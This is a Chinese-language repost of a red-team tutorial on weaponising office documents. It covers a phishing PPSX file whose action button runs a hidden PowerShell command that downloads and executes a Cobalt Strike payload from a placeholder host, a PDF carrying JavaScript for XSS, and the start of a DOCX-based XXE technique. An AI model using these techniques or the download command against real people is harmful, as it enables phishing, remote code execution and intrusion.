当前位置：首页 > news >正文

实战攻防中关于文档的妙用

news 文章来源：https://blog.csdn.net/zkaqlaoniao/article/details/138659037 2024/11/1 20:33:10

一、PPT钓鱼

简单制作一个用于钓鱼的PPTX文件

一般那种小白不知道PPT也能拿来钓鱼，这里主要是借用PPT中的”动作按钮”,
我们在插入的地方，选择“动作按钮”

然后在弹出的窗口处：

比如填入上线CS的语句：
powershell.exe -nop -w hidden -c "IEX ((new-objectnet.webclient).downloadstring('http://x.x.x.x:80/a'))"
最后我们将ppt格式保存为ppsx格式，打开即可上线

二、PDF在漏洞挖掘和红队中的一些攻击姿势

使用PDF进行XSS攻击【这个有点鸡肋，只是一种思路】
一个也不算新的攻击点，它的攻击场景其实说常见也常见说不常见也不常见，如果在日常日站中能遇到一些站的文件上传允许上传PDF，能在线解析上传的PDF，用户可以在线浏览PDF文件的，那么久可能存在XSS攻击漏洞，废话不多说，我们来制作一个恶意PDF文件，方法如下：
找一个PDF编辑器，我这边用的是迅捷，其他的编辑器应该是差不多，点击左上角选择新建空白页

单机左侧的“页面“标签，选择与之对应的页面缩略图，然后从选项下拉菜单中选择“页面属性”命令

也可以在这个位置找到

在“页面属性”对话框单击“动作”标签，再从“选择动作”下拉菜单中选择“运行 JavaScript”命令，然后单击【添加】按钮，弹出 JavaScript 编辑器对话框

在弹出的“JavaScript 编辑器”对话框中输入代码：
app.alert(‘XSS’);

我们保存后，用浏览器打开这个pdf文件[]

三、使用Word文档进行XXE攻击

1、DOCX文档的构造
使用docx文档进行xxe攻击，一般小白听都没听过，就感觉很高级的赶脚，其实ta的原理非常简单，打过CTF比赛的小伙伴们应该都知道docx本质上是压缩包，是把一堆xml文件按照一定格式压缩在一起

下图可以清晰的看到DOCX文档的实际构成

既然是xml文件，我们知道xxe攻击的本质上就是后端在处理XML相关数据的时候也执行了我们的恶意XML语句，那么我们可以把恶意语句嵌入到DOCX文档中的某些xml文件中，想办法让网站触发
这个方法的关键点在于，要去寻找那种网站本身可以阅读DOCX文档或者在线解析DOCX文档的功能，一定绕不开解析DOCX文档里的XML文件，所以那种网盘在线阅读DOCX文档、网站在线解析DOCX文档、邮件系统传输DOCX文档等等功能都有可能存在这类漏洞，下面讲讲利用姿势